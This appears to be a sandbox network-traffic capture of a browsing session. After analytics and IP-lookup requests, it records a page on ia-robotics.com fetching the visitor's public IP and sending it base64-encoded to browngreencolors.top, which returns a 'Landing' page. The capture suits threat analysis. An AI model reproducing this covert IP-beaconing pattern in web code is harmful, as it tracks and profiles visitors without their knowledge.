2025-05-21 19:48:04 UTC	1460	IN	Data Raw: a3 82 01 1b 30 82 01 17 30 1d 06 03 55 1d 0e 04 16 04 14 ec 97 76 68 29 fe 13 4f cd 74 c6 25 18 f2 00 7c da 7d d7 a7 30 1f 06 03 55 1d 23 04 18 30 16 80 14 d5 63 3a 5c 8a 31 90 f3 43 7b 7c 46 1b c5 33 68 5a 85 6d 55 30 56 06 03 55 1d 1f 04 4f 30 4d 30 4b a0 49 a0 47 86 45 68 74 74 70 3a 2f 2f 63 72 6c 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 2f 63 72 6c 2f 70 72 6f 64 75 63 74 73 2f 4d 69 63 54 69 6d 53 74 61 50 43 41 5f 32 30 31 30 2d 30 37 2d 30 31 2e 63 72 6c 30 5a 06 08 2b 06 01 05 05 07 01 01 04 4e 30 4c 30 4a 06 08 2b 06 01 05 05 07 30 02 86 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 2f 63 65 72 74 73 2f 4d 69 63 54 69 6d 53 74 61 50 43 41 5f 32 30 31 30 2d 30 37 2d 30 31 2e 63 72 74 30 0c 06 Data Ascii: 00Uvh)Ot%\|}0U#0c:\1C{\|F3hZmU0VUO0M0KIGEhttp://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl0Z+N0L0J+0>http://www.microsoft.com/pki/certs/MicTimStaPCA_2010-07-01.crt0

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:06 UTC	909	OUT	GET /ccm/collect?en=page_view&dl=https%3A%2F%2Fgogocharters.com%2Flexington-charter-bus&scrsrc=www.googletagmanager.com&frm=0&rnd=1559727493.1747856882&dt=Lexington%20Charter%20Bus%20Rental%20%7C%20GOGO%20Charters%20Lexington&auid=2043224603.1747856882&navt=n&npa=0&gtm=45He55k0v78295896za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103130498~103130500~103136993~103136995~103200004~103233427~103252644~103252646~103301114~103301116&tft=1747856881758&tfd=5298&apve=1&apvf=f HTTP/1.1 host: www.google.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / x-client-data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiJo8sBCIWgzQEIxeHOAQ== sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-21 19:48:06 UTC	432	IN	HTTP/1.1 200 OK cache-control: no-cache, no-store, must-revalidate date: Wed, 21 May 2025 19:48:05 GMT pragma: no-cache content-type: text/plain expires: Fri, 01 Jan 1990 00:00:00 GMT vary: Origin vary: X-Origin vary: Referer server: scaffolding on HTTPServer2 content-length: 0 x-xss-protection: 0 x-frame-options: SAMEORIGIN x-content-type-options: nosniff alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:06 UTC	449	OUT	GET /apc/trans.gif?fcb56c85667cf95d3e6d7dffe46dcc7d HTTP/1.1 host: ax-ring.msedge.net referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5 accept-language: en-CH accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
2025-05-21 19:48:06 UTC	690	IN	HTTP/1.1 200 OK cache-control: no-cache, no-store, must-revalidate content-length: 43 content-type: image/gif last-modified: Sun, 11 May 2025 03:48:58 GMT accept-ranges: bytes etag: 0x0DA2C2C0C44B11E89E6C66FF4F731D7D access-control-allow-origin: * access-control-expose-headers: X-EndPoint, X-FrontEnd, X-UserHostAddress, X-MSEdge-Ref, X-MachineName timing-allow-origin: * x-content-type-options: nosniff x-endpoint: LAX31r5c x-frontend: AFD x-machinename: LAX311000114007 x-userhostaddress: 191.101.61.0 x-cache: CONFIG_NOCACHE x-msedge-ref: Ref A: C2B83362AEB94E118DADCDDE0B32DA20 Ref B: LAX311000114007 Ref C: 2025-05-21T19:48:06Z date: Wed, 21 May 2025 19:48:06 GMT
2025-05-21 19:48:06 UTC	43	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b Data Ascii: GIF89a!,D;
2025-05-21 19:48:06 UTC	449	OUT	GET /apc/trans.gif?41daae4991a558c007bc1c761ae255a6 HTTP/1.1 host: ax-ring.msedge.net referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5 accept-language: en-CH accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
2025-05-21 19:48:06 UTC	690	IN	HTTP/1.1 200 OK cache-control: no-cache, no-store, must-revalidate content-length: 43 content-type: image/gif last-modified: Sun, 11 May 2025 03:48:58 GMT accept-ranges: bytes etag: 0x0DA2C2C0C44B11E89E6C66FF4F731D7D access-control-allow-origin: * access-control-expose-headers: X-EndPoint, X-FrontEnd, X-UserHostAddress, X-MSEdge-Ref, X-MachineName timing-allow-origin: * x-content-type-options: nosniff x-endpoint: LAX31r5c x-frontend: AFD x-machinename: LAX311000114007 x-userhostaddress: 191.101.61.0 x-cache: CONFIG_NOCACHE x-msedge-ref: Ref A: 2E4DC17203B043989775F36456564E67 Ref B: LAX311000114007 Ref C: 2025-05-21T19:48:06Z date: Wed, 21 May 2025 19:48:06 GMT
2025-05-21 19:48:06 UTC	43	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b Data Ascii: GIF89a!,D;

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:17 UTC	539	OUT	GET /?format=json HTTP/1.1 host: api.ipify.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / origin: https://ia-robotics.com sec-fetch-site: cross-site sec-fetch-mode: cors sec-fetch-dest: empty referer: https://ia-robotics.com/ accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-21 19:48:17 UTC	447	IN	HTTP/1.1 200 OK date: Wed, 21 May 2025 19:48:17 GMT content-type: application/json content-length: 22 access-control-allow-origin: * vary: Origin cf-cache-status: DYNAMIC server: cloudflare cf-ray: 943697281cbdf640-LAX server-timing: cfL4;desc="?proto=TCP&rtt=161711&min_rtt=161387&rtt_var=34344&sent=7&recv=9&lost=0&retrans=0&sent_bytes=3403&recv_bytes=921&delivery_rate=25005&cwnd=252&unsent_bytes=0&cid=2be899f247bdbbd0&ts=250&x=0"
2025-05-21 19:48:17 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 31 39 31 2e 31 30 31 2e 36 31 2e 32 33 22 7d Data Ascii: {"ip":"191.101.61.23"}

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:18 UTC	368	OUT	GET /?format=json HTTP/1.1 host: api.ipify.org user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: / sec-fetch-site: none sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-21 19:48:18 UTC	416	IN	HTTP/1.1 200 OK date: Wed, 21 May 2025 19:48:18 GMT content-type: application/json content-length: 22 vary: Origin cf-cache-status: DYNAMIC server: cloudflare cf-ray: 9436972d5a835295-LAX server-timing: cfL4;desc="?proto=TCP&rtt=161488&min_rtt=161193&rtt_var=25793&sent=8&recv=10&lost=0&retrans=0&sent_bytes=3403&recv_bytes=822&delivery_rate=25044&cwnd=253&unsent_bytes=0&cid=f8b7b24f0d96586c&ts=349&x=0"
2025-05-21 19:48:18 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 31 39 31 2e 31 30 31 2e 36 31 2e 32 33 22 7d Data Ascii: {"ip":"191.101.61.23"}

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:20 UTC	562	OUT	GET /counter/MTkxLjEwMS42MS4yMw== HTTP/1.1 host: browngreencolors.top sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / origin: https://ia-robotics.com sec-fetch-site: cross-site sec-fetch-mode: cors sec-fetch-dest: empty referer: https://ia-robotics.com/ accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-21 19:48:20 UTC	1414	IN	HTTP/1.1 200 OK date: Wed, 21 May 2025 19:48:20 GMT content-type: text/html; charset=utf-8 server: cloudflare x-frame-options: SAMEORIGIN x-xss-protection: 0 x-content-type-options: nosniff x-permitted-cross-domain-policies: none referrer-policy: strict-origin-when-cross-origin link: </assets/application-8b441ae0.css>; rel=preload; as=style; nopush vary: Accept,Accept-Encoding report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=uGocKoBwWqSOoAXsP6SlT2C9c6mA0gu5h5wTDxIeOoDqCYh9ki%2Bz8Dm3LGVGhrTFyROrswwPn5a7V8kaXkjSyIxOSlijLH8waMM4chYxqPruRt7h"}]} cache-control: max-age=0, private, must-revalidate x-request-id: a7936be8-a388-4700-9391-bd521cdd6785 x-runtime: 0.005714 strict-transport-security: max-age=63072000; includeSubDomains nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} cf-cache-status: DYNAMIC set-cookie: _landing_session=nZbhF8oVGSQcVvUeAtAvnMyNRQg9c3zANbtLhR9v7ZsR40AfevrnOBl7zlLTS1l3lEikGbUBGeXKxlRsd6xS7aAB2Vfb8kWaJuQ6yIWBKilg%2BHEPb%2BrGeEdJr1c5wP0I9md6u%2BKM0frm%2Blftxfe0qdYpkaCM%2FXEN95wjJXbvVMoxyNohYJQFvry8ryU5yN2QkRdW8BnFlWHQrcAPJbGto1cXGO2B%2BwCVZmXxWvIa39vm2TYQAQTe%2BNRnwuU5eVkjnFaNVV8ClaRICJzG%2FH0bmdp%2F46hAVyO%2B--VOvWEVix2lzFN2ZG--tw3eFbIO7m3CK7thEvZ6Lg%3D%3D; HttpOnly; SameSite=Lax; Secure; Path=/ cf-ray: 9436973b8a527bce-LAX alt-svc: h3=":443"; ma=86400 content-length: 1153
2025-05-21 19:48:20 UTC	1153	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4c 61 6e 64 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 Data Ascii: <!DOCTYPE html><html> <head> <title>Landing</title> <meta name="viewport" content="width=device-width,initial-scale=1"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="mobile-web-app-capable" content="yes"> <met